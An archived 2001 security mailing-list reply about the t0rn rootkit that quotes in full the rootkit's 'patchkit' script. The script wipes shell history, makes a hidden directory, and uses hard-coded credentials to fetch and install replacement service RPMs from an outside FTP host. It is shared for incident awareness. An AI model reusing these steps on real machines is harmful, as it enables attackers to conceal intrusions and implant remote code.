Security Incidents mailing list archives

Re: rootkit entertainment

From: tmiller <tmiller () va prestige net>
Date: Wed, 06 Jun 2001 09:05:25 -0400

I saw this version of t0rn back in feb. The attackers used t666.c to 
exploit the box.

                                          Toby

A patch found in the source....

#!/bin/sh
inf="Patchkit by beast"

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''
 
echo "${GRN}Patching Sequence Started..."
echo "${YEL}Fixing history file in /bin"
echo "${DRED}RE-Initiating bash_history..."
echo "${GRN}Done, linked to /dev/null ;)"
rm -rf /bin/.bash_history
ln -s /dev/null /bin/.bash_history
echo "${DRED}Creating temp path..."
mkdir -p /usr/src/.puta/rpm
echo "${DWHI}*${GRN}-Connected to dumpsite-${DWHI}*"
echo "${DWHI}*************************"
cd /usr/src/.puta/rpm
echo "${DRED}Upgrading WU-FTP, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/wu.rpm
echo "${DRED}Executing WU upgrade...${GRN}"
rpm -Uv wu.rpm
echo "${DRED}Upgrading Statd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/stat.rpm
echo "${DRED}Executing Statd upgrade...${GRN}"
rpm -Uv stat.rpm
echo "${DRED}Upgrading Vixie, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh 
ftp://ftp.fortunecity.com/help/vixie.rpm
echo "${DRED}Executing Vixie upgrade...${GRN}"
rpm -Uv vixie.rpm
echo "${DRED}Upgrading BIND, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/bind.rpm
echo "${DRED}Executing BIND upgrade...${GRN}"
rpm -Uv bind.rpm
echo "${DRED}Upgrading Imapd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/imap.rpm
echo "${DRED}Executing Imapd upgrade...${GRN}"
rpm -Uv imap.rpm
echo "${DRED}Upgrading NC, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/nc.rpm
echo "${DRED}Executing NC upgrade...${GRN}"
rpm -Uv nc.rpm
echo "${YEL}Cleaning up old files..."
rm -rf /usr/src/.puta/patch
rm -rf /usr/src/.puta/rpm
echo "${GRN}Patching done${RES}"

Current thread:

rootkit entertainment Alvin Oga (Jun 05)
- Re: rootkit entertainment Nate Carlson (Jun 05)
- Re: rootkit entertainment Alex Brock (Jun 05)
- <Possible follow-ups>
- Re: rootkit entertainment tmiller (Jun 06)